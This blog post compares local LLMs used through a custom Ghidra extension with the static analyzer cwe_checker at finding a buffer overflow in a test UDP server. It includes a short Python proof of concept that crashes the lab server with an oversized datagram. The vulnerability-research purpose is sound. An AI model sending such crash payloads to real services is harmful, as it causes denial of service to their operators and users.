Comparing AI Against Traditional Static Analysis Tools to Highlight Buffer Overflows

Overview

Large language models (LLMs) have emerged as powerful tools for source code analysis, leveraging advances in artificial intelligence and natural language processing. These models are trained on vast datasets of code and documentation, enabling them to understand programming languages and coding patterns. LLMs can perform a variety of tasks, from code completion and generation to bug detection and code refactoring.

The idea of this blog post is to use open-source software tools to analyze unknown binaries for buffer overflows. In particular, we focus on using Ollama [3] to access multiple large language models. Ollama is a platform designed to simplify the deployment and usage of LLMs on local machines. This enables private data to be held locally instead of being sent to a cloud service for processing.

We will also be comparing the results from the LLMs with cwe_checker [2], a static analysis tool for ELF binaries.

The Example Test Binary

For testing we will be using an example piece of ‘C’ source code which implements a simple UDP server. This will represent the unknown binary that contains several bugs, one of which is a buffer overflow. This will be compiled on Ubuntu Linux with stack canaries turned off (to keep the code simple) to generate an executable ELF x86 binary.

Code Sample

The following code shows the buffer overflow vulnerability.

Using Python, we can easily exploit the buffer overflow vulnerability and cause the server to crash.
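A minimal sketch of such an exploit is shown below. The target address and port are assumptions (the real values depend on how the test server is configured), and the 536-byte payload size matches the smallest crashing input discussed in the Stack Layout section below.

    import socket

    # Hypothetical target details; adjust to match the UDP server under test.
    SERVER = ("127.0.0.1", 9999)
    PAYLOAD_SIZE = 536          # smallest size observed to crash the server

    # The server copies the datagram into a 512-byte stack buffer, so anything
    # beyond that overwrites adjacent stack data and eventually the saved
    # frame/return information, crashing the process.
    payload = b"A" * PAYLOAD_SIZE

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, SERVER)
    sock.close()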

Stack Layout

The image below shows the stack after the execution has entered the function getpkt().

The following image details why it takes 536 bytes to crash the UDP server and not 513 bytes, which would be one byte more than the buffer can hold (512 bytes).

Now that we know what the issue is, let’s see how binary analysis tools can help identify the vulnerabilities.

Static Analysis

Running cwe_checker [2] on the test binary highlights a number of issues. Most importantly, it spots the main buffer overflow at address 0x0010139b, which is the recvfrom function call in getpkt().

While analyzing the test binary we also tried a Python script [1] that takes a different approach to finding stack-based buffer overflows in ‘C’ code, to see if it could do any better. After fixing some bugs and adding the recvfrom function call to the list of calls it analyzes, we finally got some usable output.

As you can see from the output, a lot more detail is given about the buffer overflow. While this approach may work, it is very fragile, as it heavily depends on the format of the Ghidra assembly listing.
Both static analysis tools require the user to have a good understanding of ‘C’ to actually spot the error in the code. Also note that both static analysis tools failed to identify the potential overflow that occurs when writing the null termination character.

LLM Analysis

Using Large Language Models for code analysis is not a new idea. The aim of this research is to test the use of LLMs for helping to reverse engineer unknown binaries and to help identify potential bugs. We decided to develop a Ghidra extension that could be used to automate tasks such as function renaming, function explanation and vulnerability checking, and to interact with various LLMs so that their outputs could be compared.

Ghidra Extension - Revit

Using GhidrOllama [4], the ReVa plugin [5] and Rhabdomancer [6] as references, we quickly developed a proof-of-concept Ghidra extension called Revit, written in Java. The Revit extension provides a context menu in the code decompilation window, as shown below.

The ‘Analyze Bad Funcs’ option is the only option that does not use the LLM. It simply bookmarks and comments the locations of the bad functions found in the binary. The list of bad functions is a hard-coded list of known dangerous functions such as memcpy, sprintf, etc.
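Revit itself is written in Java, but the idea behind this option can be illustrated with a short Ghidra Python (Jython) sketch; the function list below is only an example, not the exact list used by the extension.

    # Ghidra Jython sketch: bookmark and comment every call site of known-dangerous
    # functions. Run from the Script Manager; currentProgram and FlatProgramAPI
    # helpers such as getReferencesTo() and createBookmark() are provided by Ghidra.
    BAD_FUNCS = ["strcpy", "strcat", "sprintf", "memcpy", "gets", "scanf"]  # example list

    fm = currentProgram.getFunctionManager()
    for func in fm.getFunctions(True):
        if func.getName() in BAD_FUNCS:
            for ref in getReferencesTo(func.getEntryPoint()):
                call_site = ref.getFromAddress()
                createBookmark(call_site, "BadFuncs", "Call to %s" % func.getName())
                setEOLComment(call_site, "Potentially dangerous call to %s" % func.getName())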

Analyze Single Func

This attempts to rename all the functions in the call chain leading to the specified function. The idea behind this analysis is to try to help identify the purpose/use of the specified function. This is useful in Ghidra when a large binary has been analyzed and the functions have been given default names such as ‘FUN_001010e0’.

This can help identify the high-level functionality of the call chain by using the LLM to rename functions based on their content and actions.
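As a rough illustration of the core step (not the actual Revit implementation), the sketch below decompiles the function under the cursor with Ghidra’s Jython API and renames it using whatever name the model suggests; ask_llm_for_name() is a placeholder for the call out to the local LLM, and in practice this would be repeated for each function in the call chain.

    # Ghidra Jython sketch: decompile the current function, ask an LLM for a
    # better name, and apply it. ask_llm_for_name() is a hypothetical helper
    # that would send the decompiled C to a local model (e.g. via Ollama).
    from ghidra.app.decompiler import DecompInterface
    from ghidra.program.model.symbol import SourceType

    def ask_llm_for_name(c_code):
        # Placeholder: forward c_code to the local LLM and parse its suggestion.
        return "parse_udp_packet"

    decomp = DecompInterface()
    decomp.openProgram(currentProgram)

    func = getFunctionContaining(currentAddress)
    result = decomp.decompileFunction(func, 60, monitor)
    if result.decompileCompleted():
        c_code = result.getDecompiledFunction().getC()
        new_name = ask_llm_for_name(c_code)
        func.setName(new_name, SourceType.USER_DEFINED)
        print("Renamed %s to %s" % (func, new_name))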

Ask Question / Ask Follow on Question

These two options allow any question to be asked relating to the currently decompiled function. Ask Question starts a new conversation, while Ask Follow on Question keeps track of the context and provides it along with the follow-on question.

Explain Func

Explains the current decompiled function based on its content and adds a plate comment to the function.

Even if you are not familiar with ‘C’ code, this description may still enable you to understand what the function does at a high level.

Find Vulnerabilities

For penetration testing purposes this is probably the most useful function, as it attempts to identify vulnerabilities from the decompiled source code.

It is worth noting that the general settings and the prompt are identical for each LLM, so the only changing factor is the model in use.

Seed: 123
Temperature: 0
Top K: 40
Top P: 0.85

Input: Decompiled function getpkt()

Prompt: “Find as many vulnerabilities as you can in this function? List them by type, severity and give a short description. Respond using JSON.”
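For reference, the sketch below shows how a prompt with these settings could be sent to a locally running model through Ollama’s HTTP API. The model name, endpoint and the file holding the decompiled function are assumptions; the Revit extension itself drives this from Java rather than from a standalone Python script.

    import json
    import urllib.request

    # Sketch: send the vulnerability-hunting prompt to a local Ollama server.
    # "llama3.1" is one example model; swap in dolphin-mistral, deepseek-coder-v2, etc.
    OLLAMA_URL = "http://localhost:11434/api/generate"

    request_body = {
        "model": "llama3.1",
        "prompt": "Find as many vulnerabilities as you can in this function? "
                  "List them by type, severity and give a short description. "
                  "Respond using JSON.\n\n"
                  + open("getpkt_decompiled.c").read(),   # hypothetical file with the decompiled function
        "stream": False,
        "options": {                # same settings used for every model in the comparison
            "seed": 123,
            "temperature": 0,
            "top_k": 40,
            "top_p": 0.85,
        },
    }

    req = urllib.request.Request(
        OLLAMA_URL,
        data=json.dumps(request_body).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        print(json.loads(resp.read())["response"])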

Although the LLMs generally perform well at the other tasks described in this blog post, using them to locate vulnerabilities does not work so well. In the following examples, only the LLM is changed (dolphin-mistral, llama3.1, deepseek-coder-v2).

The vulnerability highlighted in red in the above image is a bit misleading; it is probably referring to the ‘cliaddr’.

In the above example, the two vulnerabilities highlighted in red are actually false statements. MSG_WAITALL is used, and the buffer is terminated eventually (although not before it is read by the printf call).

The Denial-of-Service vulnerability highlighted in red above is a false statement, as the recvfrom function will return once it has received the maximum number of bytes specified (1500).

The Integer Overflow vulnerability is the same as in example 1.

The last example used the entire original source code instead of the decompiled code for the single function getpkt(), which would provide the complete context for the LLM.

As we can see from the vulnerability highlighted in green, a much more specific answer was generated. We can see from the red highlight below that false vulnerabilities are still generated.

Rename Func

Rename Func uses the LLM to analyze the decompiled code in an attempt to rename the function based on its actual functionality. This is useful for understanding the high-level program flow by renaming the Ghidra-named functions starting with ‘FUN_’.

Real World Test

As a simple test, we used a bug previously found using fuzzing techniques [7] to see if the LLM could find the same bug.

Using the same prompt and the original source code, we can see that the LLM recognizes that the length value is coming from the source string and identifies this as a potential issue. This is a fairly simple example, on which the LLM has performed reasonably well.

Conclusions

As we can see from the results, open source LLMs with no modifications are quite good at some of the tasks presented. However, the more complex task of analyzing decompiled and potentially incomplete code is more challenging.

Using code written by humans provides better results than functionally identical code produced by Ghidra. This is probably due to the training material used for most of these LLMs, and potentially explains why the models do not perform so well when presented with decompiled code from Ghidra.

The results also show that LLMs can hallucinate and generate incorrect responses; however, most of the time the vulnerabilities returned were valid, with the odd error. So, although the models do not produce 100% accurate responses, the output is still helpful as a starting point.

No real effort has been put into prompt engineering at this point. This initial investigation has shown the potential of LLMs for aiding with reverse engineering and vulnerability identification, although further work is required to improve the ‘Find Vulnerabilities’ functionality.

Further Investigation

As an example of how much the prompt construction matters, a quick test was performed using the same getpkt() function decompiled from Ghidra. We changed the prompt to give an example and added a system prompt. A Web UI was used to send the prompt to the model in this example. Note how much more specific the results are compared to the earlier output for the same function.

Here are some thoughts on further work that could help improve the use of LLMs for the tasks mentioned in this blog post.

Prompt Engineering

Prompt engineering for large language models involves crafting input prompts to optimize the model responses. Here are a few approaches to examine:

Zero-Shot Prompting – Directly asking the model to perform a task without any examples, relying on its training to understand the request.

Multi-Shot Prompting – Providing a few examples of the desired input/output pairs within the prompt to guide the model on how to respond (see the sketch after this list).

Chain-of-Thought Prompting – Encouraging the model to elaborate on its reasoning process by explicitly asking it to think step-by-step, which can enhance problem-solving and complex task performance.

Contextual Prompting – Including relevant background information or context in the prompt to help the model understand the scenario or domain better.

Role-based Prompting – Assigning roles to the model (e.g., “You are a teacher. Explain…”) to lead the model’s responses in a particular direction.
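To make a couple of these techniques concrete, the sketch below combines role-based and multi-shot prompting for the vulnerability-finding task. The wording, example code and file name are illustrative only; they are not the prompts used in the tests above.

    # Illustrative prompt construction combining role-based and multi-shot prompting.
    # The messages follow the chat format accepted by Ollama's /api/chat endpoint.
    system_prompt = (
        "You are an experienced vulnerability researcher reviewing decompiled C code. "
        "Report only issues you can justify from the code itself."
    )

    # One worked example (a real multi-shot prompt would normally include several).
    example_code = "char buf[16]; strcpy(buf, user_input);"
    example_answer = (
        '[{"type": "Stack-based buffer overflow", "severity": "High", '
        '"description": "strcpy copies user_input into a 16-byte buffer with no bounds check."}]'
    )

    target_code = open("getpkt_decompiled.c").read()   # hypothetical decompiled function

    messages = [
        {"role": "system", "content": system_prompt},
        {"role": "user", "content": "Find the vulnerabilities in this function:\n" + example_code},
        {"role": "assistant", "content": example_answer},
        {"role": "user", "content": "Find the vulnerabilities in this function:\n" + target_code},
    ]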

Embeddings

Embeddings are numerical representations of data that allow models, including LLMs, to understand and process text effectively.

Text embeddings map words, phrases, or entire documents into high-dimensional vector spaces. Each vector captures semantic relationships, meaning similar texts are closer together in this space.

LLMs often use pretrained embeddings like Word2Vec, GloVe, or sentence embeddings from models like Sentence-BERT. These embeddings form the basis for understanding context and meaning.
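As a small illustration of this idea (using the sentence-transformers library rather than anything built into Ollama), the snippet below embeds three short descriptions and shows that the semantically similar pair ends up closer together in the vector space.

    # Sketch: embed short texts and compare them with cosine similarity.
    # Requires the sentence-transformers package; the model name is one common choice.
    from sentence_transformers import SentenceTransformer, util

    model = SentenceTransformer("all-MiniLM-L6-v2")

    texts = [
        "Function that copies a network packet into a fixed-size stack buffer",
        "Routine reading a UDP datagram into a local char array",
        "Function that renders a bitmap image to the screen",
    ]
    embeddings = model.encode(texts)

    # Similar descriptions produce vectors that are close together.
    print(util.cos_sim(embeddings[0], embeddings[1]))  # relatively high similarity
    print(util.cos_sim(embeddings[0], embeddings[2]))  # noticeably lower similarity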

Fine Tuning

Fine-tuning refers to the process of taking a pretrained model and training it further on a specific, often smaller, dataset to adapt it for a particular task or domain.

Fine-tuning allows the model to specialize in particular tasks by adjusting its parameters based on relevant examples. This typically requires significantly less data than pretraining because the model already has a foundational understanding of language. However, the quality and relevance of the fine-tuning data is crucial for success.

References

1. Ghidra-based-Static-Analysis-Tool-for-Detecting-Stack-Based-Buffer-Overflows (https://github.com/ecw0002/Ghidra-based-Static-Analysis-Tool-for-Detecting-Stack-Based-Buffer-Overflows/tree/main)

2. cwe_checker (https://github.com/fkie-cad/cwe_checker)

3. Ollama (https://ollama.com)

4. GhidrOllama (https://github.com/lr-m/GhidrOllama)

5. ReVa (https://github.com/cyberkaida/reverse-engineering-assistant)

6. Rhabdomancer (https://github.com/0xdea/ghidra-scripts/blob/main/Rhabdomancer.java)

7. PFCP Bug (nccgroup.com/us/research-blog/exploit-the-fuzz-exploiting-vulnerabilities-in-5g-core-networks/)